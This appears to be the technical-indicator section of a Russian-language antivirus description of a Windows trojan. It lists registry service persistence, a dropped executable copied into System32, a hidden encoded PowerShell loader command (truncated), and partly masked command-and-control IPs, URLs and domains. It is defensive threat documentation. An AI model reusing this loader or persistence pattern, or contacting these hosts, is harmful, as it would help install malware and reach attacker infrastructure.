Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\FWPUCLNT] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\FWPUCLNT] 'ImagePath' = '"<SYSTEM32>\odbctrac\FWPUCLNT.exe"'
- 'FWPUCLNT' "<SYSTEM32>\odbctrac\FWPUCLNT.exe"
- 'FWPUCLNT' <SYSTEM32>\odbctrac\FWPUCLNT.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAHYAcwBxAHEAdwBqAD0AKAAoACcATwAyACcAKwAnAGIAYQAnACkAKwAnAGYAcwAnACsAJwA2ACcAKQA7ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVABFAE0AcABcAFcATwByAGQAXAAyADAAMQA5AF...
- %TEMP%\word\2019\drar13o2q.exe
- <SYSTEM32>\odbctrac\fwpuclnt.exe
- %TEMP%\word\2019\drar13o2q.exe в <SYSTEM32>\odbctrac\fwpuclnt.exe
- '10#.#.122.110':80
- '19#.#01.86.6':443
- '45.##.219.163':443
- http://ca####ethovenlb.com/classes/mPaUG3/
- http://45.##.219.163:443/eWnPxp1ApAxrbMM/OjYnKOY3JBV/lo7tVs0K/nlDi73cnd21kOs/ via 45.##.219.163
- DNS ASK bu####uzmekursu.com
- DNS ASK ca####ethovenlb.com
- '%TEMP%\word\2019\drar13o2q.exe'
- '<SYSTEM32>\odbctrac\fwpuclnt.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAHYAcwBxAHEAdwBqAD0AKAAoACcATwAyACcAKwAnAGIAYQAnACkAKwAnAGYAcwAnACsAJwA2ACcAKQA7ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVABFAE0AcABcAFcATwByAGQAXAAyADAAMQA5AF...' (со скрытым окном)